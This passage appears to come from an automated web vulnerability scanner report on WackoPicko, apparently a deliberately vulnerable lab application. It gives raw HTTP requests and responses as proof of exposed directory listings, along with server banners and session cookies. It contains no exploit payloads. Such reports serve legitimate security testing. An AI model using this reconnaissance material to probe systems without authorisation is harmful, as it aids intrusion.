<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="flowers/">flowers/</a></td><td align="right">17-May-2011 21:25  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="foos/">foos/</a></td><td align="right">17-May-2011 21:25  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="house/">house/</a></td><td align="right">17-May-2011 21:25  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="quarters/">quarters/</a></td><td align="right">17-May-2011 21:25  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="testing/">testing/</a></td><td align="right">17-May-2011 21:25  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="toga/">toga/</a></td><td align="right">17-May-2011 21:25  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="twister/">twister/</a></td><td align="right">17-May-2011 21:25  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="twister_funeXz3uM">twister_funeXz3uM</a></td><td align="right">17-May-2011 21:25  </td><td align="right"> 47K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="twister_funxJObBz">twister_funxJObBz</a></td><td align="right">17-May-2011 21:25  </td><td align="right"> 47K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="waterfall/">waterfall/</a></td><td align="right">17-May-2011 21:25  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
</body></html>
Proof
HTTP/1.1 200 OK
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/guestbook/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 978
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

	<p class="comment">Hi, I love your site!</p>
	<p> - by adam </p>
	



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name" /><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit" />
</form>


</div>
       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 200 OK
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/upload/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 580
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /WackoPicko/upload</title>
 </head>
 <body>
<h1>Index of /WackoPicko/upload</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/WackoPicko/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="3/">3/</a></td><td align="right">17-May-2011 21:25  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="againIxwsed">againIxwsed</a></td><td align="right">17-May-2011 21:25  </td><td align="right"> 47K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="againiJ42nH">againiJ42nH</a></td><td align="right">17-May-2011 21:25  </td><td align="right"> 47K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="doggie/">doggie/</a></td><td align="right">17-May-2011 21:25  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="flowers/">flowers/</a></td><td align="right">17-May-2011 21:25  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="foos/">foos/</a></td><td align="right">17-May-2011 21:25  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="house/">house/</a></td><td align="right">17-May-2011 21:25  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="quarters/">quarters/</a></td><td align="right">17-May-2011 21:25  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="testing/">testing/</a></td><td align="right">17-May-2011 21:25  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="toga/">toga/</a></td><td align="right">17-May-2011 21:25  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="twister/">twister/</a></td><td align="right">17-May-2011 21:25  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="twister_funeXz3uM">twister_funeXz3uM</a></td><td align="right">17-May-2011 21:25  </td><td align="right"> 47K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="twister_funxJObBz">twister_funxJObBz</a></td><td align="right">17-May-2011 21:25  </td><td align="right"> 47K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="waterfall/">waterfall/</a></td><td align="right">17-May-2011 21:25  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 200 OK
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/css/blueprint/src/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=uaamb63nosf2arsi1c95ipa045

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:52:43 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 512
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /WackoPicko/css/blueprint/src</title>
 </head>
 <body>
<h1>Index of /WackoPicko/css/blueprint/src</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/WackoPicko/css/blueprint/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="forms.css">forms.css</a></td><td align="right">17-May-2011 21:25  </td><td align="right">1.4K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="grid.css">grid.css</a></td><td align="right">17-May-2011 21:25  </td><td align="right">6.1K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="grid.png">grid.png</a></td><td align="right">17-May-2011 21:25  </td><td align="right">206 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="ie.css">ie.css</a></td><td align="right">17-May-2011 21:25  </td><td align="right">1.0K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="print.css">print.css</a></td><td align="right">17-May-2011 21:25  </td><td align="right">1.8K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="reset.css">reset.css</a></td><td align="right">17-May-2011 21:25  </td><td align="right">1.1K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="typography.css">typography.css</a></td><td align="right">17-May-2011 21:25  </td><td align="right">3.1K</td><td>&nbsp;</td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/css/blueprint/print.css HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=uaamb63nosf2arsi1c95ipa045

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:52:38 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Last-Modified: Wed, 18 May 2011 01:25:57 GMT
ETag: "447e9-52d-4a382c53c9340"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 674
Content-Type: text/css

/* -----------------------------------------------------------------------

   Blueprint CSS Framework 0.7.1
   http://blueprintcss.googlecode.com

   * Copyright (c) 2007-2008. See LICENSE for more info.
   * See README for instructions on how to use Blueprint.
   * For credits and origins, see AUTHORS.
   * This is a compressed file. See the sources in the 'src' directory.

----------------------------------------------------------------------- */

/* print.css */
body {line-height:1.5;font-family:"Helvetica Neue", Helvetica, Arial, sans-serif;color:#000;background:none;font-size:10pt;}
.container {background:none;}
hr {background:#ccc;color:#ccc;width:100%;height:2px;margin:2em 0;padding:0;border:none;}
hr.space {background:#fff;color:#fff;}
h1, h2, h3, h4, h5, h6 {font-family:"Helvetica Neue", Arial, "Lucida Grande", sans-serif;}
code {font:.9em "Courier New", Monaco, Courier, monospace;}
img {float:left;margin:1.5em 1.5em 1.5em 0;}
a img {border:none;}
p img.top {margin-top:0;}
blockquote {margin:1.5em;padding:1em;font-style:italic;font-size:.9em;}
.small {font-size:.9em;}
.large {font-size:1.1em;}
.quiet {color:#999;}
.hide {display:none;}
a:link, a:visited {background:transparent;font-weight:700;text-decoration:underline;}
a:link:after, a:visited:after {content:" (" attr(href) ") ";font-size:90%;}
Proof
HTTP/1.1 200 OK
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/test/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:49 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 110
Content-Type: text/html

<html>
<head> <title></title></head>
<body>
<a href="http://">text</a>
<script>
   </script>
<frameset>

</frameset>
</body>
</html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
